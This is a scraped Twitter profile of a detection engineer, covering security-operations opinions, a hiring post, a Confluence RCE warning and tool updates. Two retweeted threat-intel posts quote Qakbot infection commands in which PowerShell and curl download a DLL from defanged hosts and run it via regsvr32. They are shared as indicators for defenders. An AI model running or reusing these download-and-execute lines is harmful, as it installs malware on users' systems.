Scott (@hellor00t) 's Twitter Profile
Scott

@hellor00t

Detection Engineering @ Amazon. BJJ Purple People Eater

ID: 3339211792

Link: https://www.scottyrotten.com

Joined: 21-06-2015 14:45:14

2.2K Tweets

534 Followers

756 Following

Scott (@hellor00t) 's Twitter Profile Photo

CORS exists to restrict and prevent loading resources from “bad” places but there exist tons of other mechanisms to bypass this security feature and it’s labeled as “intended”. INFURIATING.

Ben 'epi' Risher (@epi052) 's Twitter Profile Photo

Evening y'all! Small update to #feroxbuster: can now add scans from the interactive menu, in addition to cancelling them. Also, added an original_url field to the json output. Docs/demo of the new menu: epi052.github.io/feroxbuster-do…

proxylife (@pr0xylife) 's Twitter Profile Photo

#Qakbot - AA - url > .zip > .lnk > .ps > .dll 

powershell.exe iwr hxxps://green-a-thon.com/LosZkUvr/B.png -OutFile $env:TEMP\file172.dll;Start-Process regsvr32 $env:TEMP\file172.dll

bazaar.abuse.ch/sample/7b265f0…

IOC's
github.com/pr0xylife/Qakb…
Scott (@hellor00t) 's Twitter Profile Photo

Dashboards are an overrated analyst benefit. Data ingest, normalization, availability and orchestration/automation are far more important. Focusing on the data will allow analysts to make higher quality assessments, faster.

Scott (@hellor00t) 's Twitter Profile Photo

Burning through all my Spotify playlists was not something I had considered when switching to remote work. Anyone have any favorite Spotify playlists? I enjoy just about every music genre. #remoteworking

Steven Adair (@stevenadair) 's Twitter Profile Photo

We just posted about an unauthenticated RCE that works on all current versions of Atlassian Confluence. There is no patch or workaround available at this time. This is 10/10 on the badness scale. Get your servers off the internet now! We have seen active exploitation. #dfir

proxylife (@pr0xylife) 's Twitter Profile Photo

#Qakbot - obama188 - .html > .zip > .lnk > .dll

HTML smuggling again no .img

MD C:\ProgramData\Pterds

curl.exe -o C:\ProgramData\Pterds\HErtop.pos 185.141.26.]251/%random%.dat 

regsvr32 C:\ProgramData\Pterds\HErtop.pos

bazaar.abuse.ch/sample/5e973f1…

IOC's
github.com/pr0xylife/Qakb…
Pat_H (@pathtofile) 's Twitter Profile Photo

So...I've just released the most ridiculous project I think I've ever made... Security Information and Event Monitoring experience (SIEM) in Minecraft, with the ability to respond to and kill malicious processes [1/4] github.com/pathtofile/sie…

Scott (@hellor00t) 's Twitter Profile Photo

Last night my gym was destroyed very likely by an ex-member who was kicked out for some VERY poor behavior. It’s a shame doing the right thing has consequences. I hope justice finds this dude quick.

Chris Gates (@carnal0wnage) 's Twitter Profile Photo

Marc Smeets Detection engineering - build / maintain / improve pipelines or systems to get logs into something that can be used for detection Threat Detection - use those logs to write (high signal) detections and probably respond

Scott (@hellor00t) 's Twitter Profile Photo

I’m hiring a Senior Security Engineer for my Threat Detections team at Amazon. Desired Locations are Austin, Arlington, Seattle but other Amazon Corporate office locations could be possible. The in-office time is flexible. Please DM me with any questions! amazon.jobs/en/jobs/237688…